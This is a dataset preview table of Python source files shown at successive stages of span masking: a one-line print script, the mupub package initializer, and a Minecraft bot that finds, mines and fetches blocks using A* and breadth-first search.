index int64 0–10k | blob_id stringlengths 40–40 | step-1 stringlengths 0–305k | step-2 stringlengths 6–1.1M ⌀ | step-3 stringlengths 15–1.23M ⌀ | step-4 stringlengths 23–1.34M ⌀ | step-5 stringlengths 55–1.2M ⌀ | step-ids sequencelengths 1–5 |
---|---|---|---|---|---|---|---|
0 | aff1a9263e183610f403a4d6a7f27b45eacb7ff2 | <mask token>
| <mask token>
print(name * 1000)
| name = 'valentina '
print(name * 1000)
| name='valentina '
print(name*1000)
| null | [
0,
1,
2,
3
] |
1 | eabf06481509962652812af67ad59da5cfe30fae | <mask token>
| <mask token>
__all__ = ('__title__', '__summary__', '__version__', '__author__',
'__license__', '__copyright__')
__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'
<mask token>
__version__ = '1.0.8'
__author__ = 'Glen Larsen, Chris Sawer'
__author_email__ = '[email protected]'
__uri__ = 'http://mutopiaproject.org/'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'
<mask token>
| <mask token>
__all__ = ('__title__', '__summary__', '__version__', '__author__',
'__license__', '__copyright__')
__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'
<mask token>
__version__ = '1.0.8'
__author__ = 'Glen Larsen, Chris Sawer'
__author_email__ = '[email protected]'
__uri__ = 'http://mutopiaproject.org/'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'
from .assets import collect_assets
from .commands.build import build
from .commands.check import check
from .commands.init import init
from .commands.tag import tag
from .commands.clean import clean
from .config import CONFIG_DICT, CONFIG_DIR, getDBPath
from .config import test_config, saveConfig
from .core import MUTOPIA_BASE, FTP_BASE, URL_BASE
from .core import id_from_footer
from .exceptions import BadConfiguration, IncompleteBuild, TagProcessException
from .header import Loader, LYLoader, VersionLoader
from .header import RawLoader, Header, REQUIRED_FIELDS
from .header import find_header
from .lily import LyLocator, LyVersion
from .validate import Validator, DBValidator, in_repository
from .tagedit import tag_header, tag_file
from .rdfu import NS, MuRDF
from .utils import resolve_input, resolve_lysfile
| """ mupub module.
"""
__all__ = (
'__title__', '__summary__', '__version__',
'__author__', '__license__', '__copyright__',
)
__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'
"""Versioning:
This utility follows a MAJOR . MINOR . EDIT format. Upon a major
release, the MAJOR number is incremented and the MINOR is zeroed.
During development of an upcoming release, the MINOR number may be
incremented.
"""
__version__ = '1.0.8'
__author__ = 'Glen Larsen, Chris Sawer'
__author_email__ = '[email protected]'
__uri__ = 'http://mutopiaproject.org/'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'
from .assets import collect_assets
from .commands.build import build
from .commands.check import check
from .commands.init import init
from .commands.tag import tag
from .commands.clean import clean
from .config import CONFIG_DICT, CONFIG_DIR, getDBPath
from .config import test_config, saveConfig
from .core import MUTOPIA_BASE, FTP_BASE, URL_BASE
from .core import id_from_footer
from .exceptions import BadConfiguration, IncompleteBuild, TagProcessException
from .header import Loader, LYLoader, VersionLoader
from .header import RawLoader, Header, REQUIRED_FIELDS
from .header import find_header
from .lily import LyLocator, LyVersion
from .validate import Validator, DBValidator, in_repository
from .tagedit import tag_header, tag_file
from .rdfu import NS, MuRDF
from .utils import resolve_input, resolve_lysfile
| null | [
0,
1,
2,
3
] |
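Each row above shows one source file at progressively less masked steps; row 2 below does the same for a larger module. In every step column, spans that are not yet revealed appear as the literal string `<mask token>`, and `null` (the header's ⌀) marks a step that is absent for that row. A minimal sketch of how one might sanity-check this structure; the helper below is illustrative and not part of the dataset:

```python
def mask_counts(row, steps=('step-1', 'step-2', 'step-3', 'step-4', 'step-5')):
    """Count '<mask token>' occurrences in each non-null step column."""
    return [row[s].count('<mask token>') for s in steps if row.get(s) is not None]

# Row 0 above: step-2 still hides one span, step-3 reveals it.
row0 = {
    'step-2': "<mask token>\nprint(name * 1000)",
    'step-3': "name = 'valentina '\nprint(name * 1000)",
}
assert mask_counts(row0, steps=('step-2', 'step-3')) == [1, 0]
```

In the rows shown, the counts shrink from step-1 to step-5 as more of the original file is revealed.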
2 | 54f0ed5f705d5ada28721301f297b2b0058773ad | <mask token>
class _GenericBot:
<mask token>
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
<mask token>
<mask token>
<mask token>
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
<mask token>
<mask token>
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
<mask token>
<mask token>
<mask token>
<mask token>
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
return rtn
<mask token>
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
<mask token>
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
<mask token>
<mask token>
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block_
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +
player_loc) / 2,), 'kwargs': {'block_': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
<mask token>
| <mask token>
class _GenericBot:
<mask token>
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(*action.get('args', ()), **action.get
('kwargs', {}))
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
<mask token>
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
<mask token>
<mask token>
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
return rtn
<mask token>
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
<mask token>
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
<mask token>
<mask token>
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block_
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +
player_loc) / 2,), 'kwargs': {'block_': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
<mask token>
| <mask token>
class _Vec3(Vec3):
"""A Vec3 that is hashable. Everything in this program should use this
class."""
def __hash__(self):
"""Return the hash."""
return hash((self.x, self.y, self.z))
def clone(self):
"""Return a clone."""
return _Vec3(self.x, self.y, self.z)
class _GenericBot:
"""A generic bot."""
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(*action.get('args', ()), **action.get
('kwargs', {}))
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
def contains(self, block_):
"""Return whether or not the bot contains the block id."""
return block_ in self._inventory
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
def _add_to_inv(self, block_):
"""Add the block to the inventory."""
if block_ in self._inventory:
self._inventory[block_] += 1
else:
self._inventory[block_] = 1
def _move_up(self, exclude=None):
"""Move and place a block below.
If exclude is not None, place a block that is not 'exclude'.
"""
self._move(self._pos + _Vec3(0, 1, 0))
self._place(self._pos + _Vec3(0, -1, 0), exclude)
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
return rtn
def _surrounded(self):
"""Return whether or not the bot is surrounded by water."""
for dir_ in _adj_dirs():
if self._get_block(self._pos + dir_) != _WATER:
return False
return True
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
def _can_place(self, loc):
"""Return whether or not the bot can place a block at that location
independent of what it has in its inventory."""
non_blocks = [_AIR, _WATER, _LAVA]
player = [self._pos, self._pos + _Vec3(0, 1, 0)]
for dir_ in _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:
new_loc = loc + dir_
if new_loc not in player and self._get_block(new_loc
) not in non_blocks:
return True
return False
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
raise NotImplementedError
def _move(self, pos):
"""Move there only."""
self._pos = deepcopy(pos)
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block_
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
